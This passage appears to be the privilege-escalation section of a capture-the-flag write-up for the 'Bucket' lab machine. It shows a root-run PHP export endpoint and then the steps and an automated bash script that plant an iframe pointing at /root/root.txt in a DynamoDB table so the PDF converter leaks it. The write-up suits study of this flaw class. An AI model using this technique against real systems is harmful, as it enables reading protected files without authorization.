6 privesc
The service running on port 8000 is assigned the user root (`AssignUserId root root` in the vhost below):
<VirtualHost 127.0.0.1:8000>
<IfModule mpm_itk_module>
AssignUserId root root
</IfModule>
DocumentRoot /var/www/bucket-app
</VirtualHost>
http://localhost:8000/
Site under construction or maintenance
roy@bucket:~$ ls -la /var/www/bucket-app/
total 856
drwxr-x---+ 4 root root 4096 Feb 10 2021 .
drwxr-xr-x 4 root root 4096 Feb 10 2021 ..
-rw-r-x---+ 1 root root 63 Sep 23 2020 composer.json
-rw-r-x---+ 1 root root 20533 Sep 23 2020 composer.lock
drwxr-x---+ 2 root root 4096 Feb 10 2021 files
-rwxr-x---+ 1 root root 17222 Sep 23 2020 index.php
-rwxr-x---+ 1 root root 808729 Jun 10 2020 pd4ml_demo.jar
drwxr-x---+ 10 root root 4096 Feb 10 2021 vendor
roy@bucket:/var/www/bucket-app$ cat index.php
<?php
// Alert-export endpoint: on a POST with action=get_alerts it copies matching
// DynamoDB items into HTML files and converts one of them to files/result.pdf.
// NOTE(review): this listing is cut off right after the else branch opens.
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
// NOTE(review): $_POST["action"] is read without an isset()/?? guard, so a POST
// that omits the field triggers an undefined-key notice or warning (PHP version dependent).
if($_POST["action"]==="get_alerts") {
date_default_timezone_set('America/New_York');
// The client targets a local endpoint (localhost:4566) and takes its
// credentials from the 'default' profile.
$client = new DynamoDbClient([
'profile' => 'default',
'region' => 'us-east-1',
'version' => 'latest',
'endpoint' => 'http://localhost:4566'
]);
// Scan the 'alerts' table, keeping only items whose title equals "Ransomware".
$iterator = $client->getIterator('Scan', array(
'TableName' => 'alerts',
'FilterExpression' => "title = :title",
'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
));
// Each matching item's "data" attribute is written to files/<1-10000>.html with
// no validation or filtering of its content.
// NOTE(review): whoever can write to 'alerts' therefore controls the markup that
// is rendered below; the table must be treated as untrusted input.
// NOTE(review): rand() names can repeat, in which case an earlier file is overwritten.
foreach ($iterator as $item) {
$name=rand(1,10000).'.html';
file_put_contents('files/'.$name,$item["data"]);
}
// The conversion runs once, after the loop, so only the last file written
// ($name) is turned into files/result.pdf.
// NOTE(review): $name is never assigned when the scan returns no items, yet the
// command is still executed.
// NOTE(review): the vhost shown for this app is configured with
// "AssignUserId root root", so the converter runs as root; presumably any local
// resource the stored HTML references is read with root's file access - confirm
// against the converter's documentation.
// Hardening: run the vhost as an unprivileged account, strip or allowlist markup
// before rendering, disable local-file loading in the converter if it supports
// that, and restrict who may create or write the 'alerts' table.
passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
}
}
else
{
?>
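# if the request is a POST with action="get_alerts":
# it connects to DynamoDB, scans the table "alerts" and filters by title "Ransomware"
# for each entry, it creates a randomly named .html file and writes the entry's contents to it
# pd4ml then converts the last file written into files/result.pdf; because the vhost runs as root, the stored HTML is rendered with root privileges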
Exploit Process:
- Create the table `alerts`
- Add an entry to the table with an iframe that reads `/root/root.txt`
- Send a POST request to `:8000` with `action=get_alerts`
- Check for `result.pdf` in `/var/www/bucket-app/files/`
# creating table in dynamodb
var params = {
"TableName": "kashz",
"KeySchema": [
{ "AttributeName": "title", "KeyType": "HASH" },
{ "AttributeName": "data", "KeyType": "RANGE" }
],
"AttributeDefinitions": [
{ "AttributeName": "title", "AttributeType": "S" },
{ "AttributeName": "data", "AttributeType": "S" }
],
"ProvisionedThroughput": {
"ReadCapacityUnits": 10,
"WriteCapacityUnits": 5
}
};
dynamodb.createTable(params, function(err, data) {
if (err) ppJson(err); // an error occurred
else ppJson(data); // successful response
});
# using cli
$ cat create-table.json
{
"TableName": "kashz",
"KeySchema": [
{ "AttributeName": "title", "KeyType": "HASH" },
{ "AttributeName": "data", "KeyType": "RANGE" }
],
"AttributeDefinitions": [
{ "AttributeName": "title", "AttributeType": "S" },
{ "AttributeName": "data", "AttributeType": "S" }
],
"ProvisionedThroughput": {
"ReadCapacityUnits": 10,
"WriteCapacityUnits": 5
}
}
$ aws dynamodb --endpoint-url http://s3.bucket.htb create-table --cli-input-json file://create-table.json
# adding using put-item
var params = {
TableName: 'kashz',
Item: {
"title": "ransomware",
"data": "/root/root.txt",
},
};
docClient.put(params, function(err, data) {
if (err) ppJson(err); // an error occurred
else ppJson(data); // successful response
});
# using cli
$ aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name kashz --item '{"title":{"S":"item3"},"data":{"S":"/root/root.txt"}}'
# now to send request to :8000 with action=get_alerts
curl -X POST http://127.0.0.1:8000 --data "action=get_alerts"
Automated Exploit File
# using script
#!/bin/bash
echo "Creating 'alerts' table:"
cat << EOF > create-table.json
{
"TableName": "alerts",
"KeySchema": [
{ "AttributeName": "title", "KeyType": "HASH" },
{ "AttributeName": "data", "KeyType": "RANGE" }
],
"AttributeDefinitions": [
{ "AttributeName": "title", "AttributeType": "S" },
{ "AttributeName": "data", "AttributeType": "S" }
],
"ProvisionedThroughput": {
"ReadCapacityUnits": 15,
"WriteCapacityUnits": 10
}
}
EOF
aws dynamodb --endpoint-url http://s3.bucket.htb create-table --cli-input-json file://create-table.json
sleep 2
echo "Adding record:"
aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name alerts --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><iframe src=\"/root/root.txt\"></iframe><html>"}}'
sleep 2
echo "Listing records:"
aws dynamodb scan --table-name alerts --endpoint-url http://s3.bucket.htb
echo "Sending POST request:"
curl -X POST http://127.0.0.1:8000 --data "action=get_alerts"
echo "Done!"
Now we can read the .pdf file, and it contains the flag.